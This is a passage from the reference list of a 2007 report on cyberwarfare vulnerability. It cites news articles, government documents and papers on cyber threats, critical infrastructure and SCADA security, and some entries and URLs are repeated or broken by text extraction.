Why? Hudson, Rex A. September, 1999. A Report Prepared under an Interagency Agreement by the Federal

Research Division, Library of Congress

Interview: O. Sami Saydjari." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007

<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/saydjari.html

"Israeli Citizen Attacks Government Computers." Computer Crime and Intellectual Property Section. US

Department of Justice. <http://www.usdoj.gov/criminal/cybercrime/cccases.html>.



Kabay, M. E. (2003) “Tapping Fiber Optics Gets Easier”. Network World. 29 Oct 2007.

http://www.networkworld.com/newsletters/sec/2003/0303sec1.html


http://www.garykessler.net/library/ddos.html

Know Your Enemy – Tools and Methodologies. 21 Jul 2000. 30 Oct 2007.

http://www.honeynet.org/papers/enemy/index.html

Krebs, Brian. “Cyber war games test future troops.” Washington Post: April 23, 2003.

Laprise, John. IEEE Technology & Society Magazine. Vol. 25 Issue 3, pg. 28.

Laribee, Lena, et. al. Analysis and Defensive Tools for Social-Engineering Attacks on Computer Systems.

Information Assurance Workshop, 2006 IEEE. 388 – 389, 21-23 June 2006.


<http://www.securityfocus.com/news/11402/2>.

Lineweber, David and Shawn McNulty (2001). “The Cost of Power Disturbances to Industrial & Digital Economy

Companies”. Electric Power Research Institute, Inc. 30 Oct 2007. <http://www.epri-


df>

Lester W. Grau and Timothy L. Thomas. “A Russian View of Future War: Theory and

Direction,” The Journal of Slavic Military Studies. Issue 9.3 (Sept. 1996), pp. 501-518.

Lewis, J.. (2002). Assessing the risks of cyber terrorism, cyber war and other cyber threats Washington, D.C.:

Center for Strategic & International Studies.

Mendis, Surakshan. Packet Sniffing. 2005. SuraSoft. 30 Oct 2007.

<http://www.surasoft.com/articles/packetsniffing.php>.



http://www.fas.org/irp/threat/frd.html

http://www.networkworld.com/newsletters/sec/2003/0303sec1.html

http://www.garykessler.net/library/ddos.html

http://www.honeynet.org/papers/enemy/index.html

http://www.surasoft.com/articles/packetsniffing.php

http://www.cnn.com/2007/US/09/26/power.at.risk/

141

Messmer, Ellen (2006, March 14). IBM survey on cybercrime shows IT managers wary. Retrieved November 1,

2007, from Network World. Web site: http://www.networkworld.com/news/2006/031406-ibm-survey-

cybercrime.html

Mitnick, Kevin, & Simon, William L. (2005). The Art of Intrusion: When Terrorists Come Calling. Indianapolis,

IN: John Wiley and Sons, Inc.

Moore, David et al. Inferring Internet Denial of Service Activity. ACM Transmission on Computer Systems. Vol.

24, No. 2, May 2006, 115–139.

Moore, J. (2007 February 26). FCW.com. Retrieved October 25, 2007, from Freight security programs and test

projects proliferate Web site: http://www.fcw.com/print/13_5/news/97727-1.html

Mullen, M. (2004, September 16). Human error caused chaos in the sky. Retrieved October 25, 2007, from MSNBC

Online Web site: http://www.msnbc.msn.com/id/6021929/

"Multi-State Information Sharing and Analysis Center (MS-ISAC)." 2006. Multi-State Information Sharing and

Analysis Center (MS-ISAC). 21 Oct. 2007 <http://www.msisac.org/scada/>.

Nachenberg, Carey. "Computer Virus-antivirus Coevolution." Communications of the ACM 40.1 (1997): 46-51.

Naraine, Ryan. Hackers Selling Vista Zero-Day Exploit. 15 Dec 2006. eWeek.com. 26 Nov 2007.

<http://www.eweek.com/article2/0,1895,2073611,00.asp>

National Cyber Security Alliance: Stay Safe Online. Retrieved October 31, 2007, from Stay Safe Online Web site:

http://www.staysafeonline.org/

"National Cyber Securtiy Division." Department of Homeland Security. 23 Sept. 2006. US Government.

<http://www.dhs.gov/xabout/structure/editorial_0839.shtm>.

National Infrastructure Advisory Council." Department of Homeland Security. Oct. 2007. US Government.


“National Infrastructure Protection Center Highlights”. National Infrastructure Protection Agency. 15 June 2001, p.

2. 30 Oct 2007 http://www.iwar.org.uk/infocon/nipc-highlights/2002/highlight02-03.pdf

“National Security Advisor Rice on Protecting U.S. Infrastructure”. 22 March 2001. 27 Oct 2007.

http://www.usembassy.it/file2001_03/alia/a1032210.htm

National Strategy to Secure Cyberspace. Feb. 2003. US Government.



NTIA: Critical Infrastructure Protection. Retrieved November 3, 2007, from NTIA Web site:


“Pentagon Admits Security Breach but won’t say who did it” NetworkWorld.com, 30 October, 2007

http://www.networkworld.com/community/node/19041

Perdue University. Virus Terminology. 2005. 1 Dec. 2005

<http://www.purdue.edu/securepurdue/steam/help/view.cfm?KBTopicID=210>.

Pethokoukis, James. (2007) “So How Goes Bin Laden’s War on the U.S. Economy?” U.S. News & World Report.

27 Oct 2007. http://www.usnews.com/blogs/capital-commerce/2007/9/11/so-how-goes-bin-ladens-war-on-the-us-

economy.html

http://www.fcw.com/print/13_5/news/97727-1.html

http://www.msnbc.msn.com/id/6021929/

http://www.staysafeonline.org/

http://www.iwar.org.uk/infocon/nipc-highlights/2002/highlight02-03.pdf

http://www.usembassy.it/file2001_03/alia/a1032210.htm



http://www.networkworld.com/community/node/19041

http://www.usnews.com/blogs/capital-commerce/2007/9/11/so-how-goes-bin-ladens-war-on-the-us-economy.html

http://www.usnews.com/blogs/capital-commerce/2007/9/11/so-how-goes-bin-ladens-war-on-the-us-economy.html

142

Pike, J. (2007, July 7). Chronology of terrorist attacks against public transit. Retrieved October 30, 2007, from

Global Security Web site: http://www.globalsecurity.org/security/ops/mass-transit-chron.htm

Poll Shows Americans Want Congress to Do More to Protect Them Online." Cyber Security Industry Alliance

(2006): 30. 21 Oct. 2007

<https://www.csialliance.org/news/pr/view?item_key=e5b543c0cf207bb110c9c65b61ac476ec45e03fe>.

"Poll: 50% of NYC Says U.S. Govt Knew." 30 Aug. 2004. Zogby International Polling/Market Research. 28 Oct.

2007 <http://www.911truth.org/article.php?story=20040830120349841>.

Poulsen, K. “Slammer worm crashed Ohio nuke plant network.” Security Focus. 19 August 2003. 12 Sep. 2007. <

http://www.securityfocus.com/news/6767>

"Privacy Impact Assessment EINSTEIN Program Collecting, Analyzing, and Sharing Computer Security

Information Across the Federal Civilian Government." US-CERT. Sept. 2004. Department of Homeland Security.

<http://www.dhs.gov/xlibrary/assets/privacy/privacy_pia_eisntein.pdf>.

Raymond, Eric. The on-line hacker Jargon File 4.4.7. 29 Dec 2003. 26 Nov 2007

http://www.catb.org/jargon/html/index.html

Reid, Tim, (2007). “China’s cyber army is preparing to march on America, says Pentagon” The Times. 30 October,

2007.

http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article2409865.ece

"Report Reveals Perception Gap in Cyber Security Awareness." Security Products 2 Oct. 2007. 20 Oct. 2007

<http://www.secprodonline.com/articles/50717/>.

Rootkits: The Growing Threat. 2006 McAfee Inc. 1 Nov 2007. http://download.nai.com/products/mcafee-

avert/WhitePapers/AKapoor_Rootkits1.pdf

Rogin, Josh, (2006). “DOD: China fielding cyberattack units” 30 October, 2007

http://www.fcw.com/online/news/94650-1.html

Ruggles, Steven. Historical Bush Approval Ratings. Dept. of Hist., U. of Minnesota. 2007. 27 Oct. 2007

<http://www.hist.umn.edu/~ruggles/Approval.htm>.




31. 24 Oct. 2007


Shane, Leo III, (2007). “AF Taking Careers into Cyberspace” 30 October, 2007,

http://www.military.com/features/0,15240,152400,00.html?wh=benefits

“STATEMENT OF GENERAL JAMES E. CARTWRIGHT COMMANDER UNITED STATES STRATEGIC

COMMAND BEFORE THE HOUSE ARMED SERVICES COMMITTEE ON UNITED STATES STRATEGIC

COMMAND 21 March 2007” 30 October, 2007

<http://armedservices.house.gov/pdfs/FC032107/Cartwright_Testimony032007.pdf>


http://www.securityfocus.com/news/6767

http://www.catb.org/jargon/html/index.html

http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article2409865.ece

http://download.nai.com/products/mcafee-avert/WhitePapers/AKapoor_Rootkits1.pdf

http://download.nai.com/products/mcafee-avert/WhitePapers/AKapoor_Rootkits1.pdf

http://www.fcw.com/online/news/94650-1.html

http://www.military.com/features/0,15240,152400,00.html?wh=benefits

143


Time. 30 October, 2007, < http://www.time.com/time/magazine/article/0,9171,1098961-1,00.html>

Thomas, Pierre (1998). Teen hacker faces federal charges. Retrieved October 25, 2007, from CNN.com Web site:

http://www.cnn.com/TECH/computing/9803/18/juvenile.hacker/index.html

Transportation Research Board. (2003). Cybersecurity of freight information systems: A scoping study Washington,

D.C.: Transportation Research Board.

Traffic details for staysafeonline.info. Retrieved November 3, 2007, from Alexa: The Web Information Company.

Web site: http://alexa.com/data/details/traffic_details?url=staysafeonline.info


<http://www.iwar.org.uk/cip/resources/utilities/SCADAWhitepaperfinal1.pdf>.

"United States Computer Emergency Readiness Team." Department of Homeland Security. US Government.

<http://www.uscert.gov/>.

US-CERT. Home Computer Security - Examples. 2002. 1 Nov. 2005

<http://www.cert.org/homeusers/HomeComputerSecurity/examples.html>.

http://archives.cnn.com/2001/TECH/ptech/10/21/black.ice.idg/index.html Utah’s ‘Black Ice’: Cyber-attack

scenario. Verton, Dan. October 21, 2001.

Wald, M. L. Can Computers Foil Air Pirates?. (2002, April 11). New York Times


and Cyberwar: Capabilities and Related Policy Issues” 30 October, 2007. http://stinet.dtic.mil/cgi-

bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?

http://query.nytimes.com/gst/fullpage.html?res=9F01E1DD1E39F933A05756C0A960958260&sec=&spon=&page

wanted=all Wiren, Christopher S. May 30, 1996. The New York Times. Plot of Terror in the Skies Is Outlined by

a Prosecutor.

http://www.wired.com/politics/law/news/2000/07/37503

“Wireless Vulnerabilities”. Maisonbisson. 24 Sept 2002. 30 Oct 2007.

<http://maisonbisson.com/blog/post/10387/wireless-vulnerabilities>

"What is SCADA?" The Tech-FAQ. 2007. 27 Oct. 2007 <http://www.tech-faq.com/scada.shtml>.

Wood, Anthony & Stankovic, John. Denial of Service in Sensor Networks. IEEE – Computer. Oct 2002. 54 – 62

Yeh, Y.C. (2001).Safety critical avionics for the 777 primary flight controls system. Digital Avionics Systems. 1, 1-

11.

http://www.time.com/time/magazine/article/0,9171,1098961-1,00.html

http://archives.cnn.com/2001/TECH/ptech/10/21/black.ice.idg/index.html

http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?

http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?



Cyberwarfare Vulnerability Assessment (2007)

Documents

Transcript of Cyberwarfare Vulnerability Assessment (2007)